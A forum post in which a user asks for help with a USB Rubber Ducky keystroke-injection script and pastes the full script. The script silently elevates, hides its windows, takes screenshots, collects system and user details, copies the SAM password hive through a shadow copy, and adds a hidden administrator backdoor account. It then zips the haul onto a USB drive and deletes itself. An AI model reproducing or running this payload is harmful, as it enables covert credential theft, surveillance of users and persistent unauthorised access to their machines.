BlAd373 Posted November 29, 2017 Share Posted November 29, 2017 I'm trying to create a script that allows me to recognize some info from a windows PC and save them directly on rubber duckyit's possible?what am I wrong with this script? REM Recon DELAY 200 GUI r DELAY 100 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 200 ALT y DELAY 200 ENTER ALT SPACE DELAY 100 STRING m DELAY 100 DOWNARROW REPEAT 100 ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'\Screenshots' -ItemType Directory ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $File = "$jpegSaveDir\$jpegName.bmp" ENTER STRING Add-Type -AssemblyName System.Windows.Forms ENTER STRING Add-type -AssemblyName System.Drawing ENTER STRING $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen ENTER STRING $Width = $Screen.Width ENTER STRING $Height = $Screen.Height ENTER STRING $Left = $Screen.Left ENTER STRING $Top = $Screen.Top ENTER STRING $bitmap = New-Object System.Drawing.Bitmap $Width, $Height ENTER STRING $graphic = [System.Drawing.Graphics]::FromImage($bitmap) ENTER STRING $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) ENTER STRING $bitmap.Save($File) ENTER STRING $x++ } while ($x -ne 8); ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '\' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '\' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Computer = $env:COMPUTERNAME ENTER STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080 ENTER STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>' ENTER STRING foreach ($PortNumber in $PortList) { ENTER STRING $PortCheck = New-Object Net.Sockets.TcpClient ENTER STRING $PortCheck.Connect($Computer, $PortNumber) ENTER STRING if ($PortCheck.Connected) { ENTER STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'} ENTER STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}} ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $u = 0 ENTER STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) ENTER STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>' ENTER STRING do { ENTER STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) ENTER STRING $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>" ENTER STRING Write-Output $fullUSB ENTER STRING $u ++ ENTER STRING } while ($u -lt $allUsb.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>' ENTER STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '</div>' ENTER STRING Net User test test1 /ADD ENTER STRING Net LocalGroup Administrators test /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v test /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL s DELAY 750 STRING C:\Windows\config-86652.ps1 ENTER DELAY 100 ALT F4 DELAY 100 GUI r DELAY 200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 200 ALT y DELAY 200 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config-86652.ps1 ENTER STRING exit DELAY 100 ENTER Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.